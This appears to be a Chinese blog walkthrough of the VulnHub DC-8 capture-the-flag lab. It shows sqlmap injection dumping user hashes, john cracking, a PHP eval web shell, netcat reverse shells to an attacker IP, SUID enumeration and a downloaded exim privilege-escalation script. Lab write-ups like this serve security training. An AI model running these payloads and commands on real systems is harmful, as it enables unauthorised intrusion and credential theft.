vulnhub靶场之DC-8靶场实战(超详细)

2024-08-14 21:11:45 浏览数 (2)

攻击机kali:192.168.111.146

靶机DC-8:192.168.111.143

信息收集

IP

端口

代码语言:javascript复制
nmap -A -p- -T4 192.168.111.143

目录

代码语言:javascript复制
dirsearch -u http://192.168.111.143 -i 200

得到登录页面,想办法得到用户名和密码,尝试了暴力破解,弱口令等等方式

CMS

漏洞探测

访问网站首页,http://192.168.111.143/?nid=1,通过nid进行传参

在传参nid=1加上‘,页面显示报错信息,存在SQL注入漏洞

也可以使用sqlmap探测漏洞

代码语言:javascript复制
sqlmap -u "http://192.168.111.143/?nid=1" --batch

爆破数据库

代码语言:javascript复制
sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 --dbs
--risk=3 :风险等级,对目标系统安全性要求较低,对速度要求较高,谨慎使用,可能会对系统造成影响(0-3.等级越低,影响越小)
--level=5:测试等级,5级包含的payload最多(1-5.测试等级越高,测试将越全面,)

爆破数据表

代码语言:javascript复制
sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db --tables

爆破字段

代码语言:javascript复制
sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db -T users --columns

爆破字段内容

代码语言:javascript复制
sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db -T users -C name,pass --dump

密码爆破

密码是加密的,其hash值存储为txt文件后,使用哈希工具john 进行hash爆破

代码语言:javascript复制
touch passwd.txt 新建一个文件
vim passwd.txt 编辑文件内容,将hash之进行存储
john passwd.txt 使用John工具解密

登录网站,john/turtle

目的拿到webshell,上传木马,蚁剑连接,进行反弹shell

验证php代码是否能够被解析

代码语言:javascript复制
<p>LULU</>
<?php phpinfo();?> 

注入一句话木马,反弹shell

代码语言:javascript复制
<?php @eval($_REQUEST[6]);?>

蚁剑链接,虚拟终端,反弹shell

代码语言:javascript复制
nc -e /bin/bash 192.18.111.128 6666

kali监听

代码语言:javascript复制
nc-lvnp 6666

第二种方式:直接在表单设置内容中,写入反弹shell,kali 进行监听

代码语言:javascript复制
<p>LULU</p>
<?php
system("nc -e /bin/bash 192.168.111.128 1234")
?> 

交互式shell

代码语言:javascript复制
python -c "import pty;pty.spawn('/bin/bash')"

提权

suid提权

代码语言:javascript复制
SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限,若是对一些特殊命令设置了SUID,那么将会有被提权的风险
常用的SUID提权命令有:nmap、vim、find、bash、more、less、nano、cp等。

sudo和SUID的区别
    sudo是给某个用户或者组授予执行某些命令的权限,权限在人身上
    SUID是给命令赋予root用户的权限,权限在命令上
代码语言:javascript复制
find / -perm -u=s -type f 2>/dev/null

查看exim的版本

代码语言:javascript复制
exim4 --version

使用searchsploit 对exim 4.89在漏洞库中查找可利用的漏洞

代码语言:javascript复制
searchsploit exim 4.89

没有本地提权的漏洞,直接查找exim可利用的漏洞

代码语言:javascript复制
searchsploit exim 

查看漏洞

下载脚本

切换在/var/www/html,打开apache服务

代码语言:javascript复制
systemctl start apache2

在shell中下载

代码语言:javascript复制
wget http://192.168.111.128/46996.sh

需要切换到/tmp目录,进行下载

当前用户,和用户组权限不高,需要进行提权

代码语言:javascript复制
chmod 777 46996.sh

查看脚本文件,使用方法

代码语言:javascript复制
cat 46996.sh

两种使用方式进行提权

代码语言:javascript复制
./46996.sh -m setuid 提权不成功
./46996.sh -m netcat 

得到flag

0 人点赞